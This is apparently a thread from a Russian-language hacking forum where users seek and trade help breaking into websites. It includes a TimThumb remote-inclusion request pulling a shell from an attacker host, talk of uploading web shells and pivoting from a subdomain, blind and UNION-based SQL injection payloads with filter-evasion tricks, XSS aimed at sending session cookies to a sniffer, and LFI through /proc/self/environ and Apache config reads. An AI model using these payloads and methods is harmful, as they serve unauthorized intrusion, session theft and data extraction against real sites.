Тебе нужен не выполненный php скрипт, а сорцы т.е. ты когда заходишь на http://site.com/index.php , где index.php содержит : PHP: <?php echo привет; ?> ты видишь слово "привет", т.е. результат скрипта, а не сорцы => попробуй : PHP: /wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.txt Или нужно, чтоб у тебя в настройках http://blogger.com.site.com/ не исполнялиь php-скрипты (другой хостинг, типа narod.ru) Другими словами если ты зайдешь на http://site.narod.ru/index.php , с тем же содержанием ты увидишь не исполненный скрипт, а собственно сорцы: PHP: <?php echo привет; ?>
одно слово и без кавычек работает... а ниочем это для тебя, т.к. ты это знаешь, а для того кто не знает нужно описывать подробно, чтоб понятно было с примерами... хотя может и дурацкими
Если уж ты даёшь советы, да ещё даёшь советы тем кто даёт советы о том как правильно давать советы, посмотри на вопрос : "Word press TimThumb" Если ты понятия не имеешь о чём речь, зачем твои советы по поводу народа и .txt расширения, да ещё рассуждения о том как нужно советовать?
/index.php?artid=30 and 1=2 - ошибко /index.php?artid=30 and 1=1 - норм /index.php?artid=30 select - нормал /index.php?artid=30 UniON - страничка пугалка а.к.а "за вамы уже выехали" остается тока крутить как блинд? отчета об ошибки нету
залил все таки шелл на поддомен, все ок, но возникла проблема. сайт на другом ипе, основной. можно ли через поддомен пробраться к сайту?
Есть сайт на Drupal.Раньше спокойно приходили куки, но после его обновления перестало приходить id сессии вида "SESSd9cc53338c9b7991787e099f00cbe150"-к примеру. Знаю что дело не в сниффере ибо при вводе <script>javascript:alert(document.cookie)</script> id тоже нет Зато сессию можно просмотреть в куках браузера И как же мне получить эту сессию на сниффер??Сорри на нубство
Возможно что основной сайт написан на том что и сайт на поддомене, если залил шелл попробуй поискать баги в коде и применить их на основном домине, у меня бывали такие случии что прокатывало...
Подскажите, пожалуйста, нубу.. Каким образом дампится блинд sql скуль? знаю количество столбцов, имя бд, таблицы и столбцов.. Попробовал несколько паблик прог - не катит..
Столкнулся с проблемой: 1) Есть 2 сервера, которые как-то слинкованы между собой - т.е. с одного можно читать файлы другого и наоборот. 2) Найдена функция позволяющая читать содержимое файла и вот хз, что это. Скорее всего релинковка через htaccess 3) Добрался до конфигов, кроме httpd, логи же вообще читать не позволяет, хотя установил место-положение. 4) Пути до 2 сервера не могу найти ну вообще никак - логический перебор названий ни к чему не привел, при этом раскрытия путей точно нет. Читать из веба файлы он отказывается, что делать? 5) Файлы судя по всему хранятся не по тому адресу, что показываются - как результат напрямую запросить залитый шелл не могу, и логический перебор опять же не помог. Что можно сделать? Куда копать? Имеет ли смысл вообще раскручивать этот способ или браться за поиск других ошибок? PS /proc/sys/ и етк спокойно читаются. PS это дебиан -_-
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,5+--+ http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,user()+--+ Как боротся?
Собственно интересно как можно оказаться воздействие на переменные окружения при: APACHE_PID_FILE=/var/run/apache2.pid APACHE_RUN_USER=www-data PATH=/usr/local/bin:/usr/bin:/bin PWD=/ APACHE_RUN_GROUP=www-data LANG=C SHLVL=1 _=/usr/sbin/apache2
Pirotexnik aes_decrypt(aes_encrypt(user())) RuDefc0n там нету переменных окружения. следовательно никак не можете. если я правильно понял у вас LFI с /proc/self/environ
По сути полноценный lfi, только вот он читает файлы, а не запускает. Логи почитать не дает + реальный путь никак не вытащить до папки, где нахожусь - разве что перебором, но нативный логический перебор не помог. Кучу конфигов уже перечитал. Судя по всему конкретно в той папке откуда обычно читает не исполняются файлы. Пока из всего только остается брутить ssh, но это наркоманство.
по информации из environ видно что там наверняка дебиан бейсд дистро какой то (debian/ubuntu), пробовал читать /etc/apache2/conf/apache2.conf ? там спалишь пути к htdocs, а дальше читаем скрипты..
Что-то я не врубился О_0 -1110+union+select+1,2,3,4,aes_decrypt(aes_encrypt(user()))+--+ -1110+union+select+1,2,3,4,unhex(hex(user()))+--+ Что за?
